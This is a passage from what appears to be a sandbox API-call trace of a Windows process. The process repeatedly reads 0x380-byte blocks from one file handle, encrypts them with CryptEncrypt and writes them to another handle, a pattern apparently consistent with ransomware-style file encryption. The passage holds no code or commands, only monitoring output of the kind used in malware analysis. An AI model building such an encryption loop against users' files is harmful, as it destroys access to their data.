(in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.135] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.135] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.135] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.135] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.135] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.135] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.135] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.135] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.135] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.135] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.136] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.136] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.136] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.136] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.136] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.136] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.136] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.136] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.136] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.136] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.136] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.136] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.137] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.137] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.137] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.137] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.137] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.137] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.137] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.137] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.137] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.137] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.138] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.138] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.138] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.138] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.138] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.138] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.138] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.138] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.138] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.138] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.138] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.138] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.139] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.139] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.139] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.139] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.139] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.139] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.139] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.139] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.139] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.139] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.140] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.140] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.140] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.140] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.140] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.140] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.140] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.140] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.141] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.141] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.141] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.141] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.141] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.141] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.141] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.141] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.141] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.141] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.141] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.141] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.142] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.142] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.142] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.142] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.142] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.142] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.142] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.142] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.142] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.143] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.143] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.143] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.143] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.144] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.144] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.145] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.145] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.145] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.145] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.145] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.145] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.145] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.145] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.145] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.145] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.145] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.145] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.145] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.146] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.146] 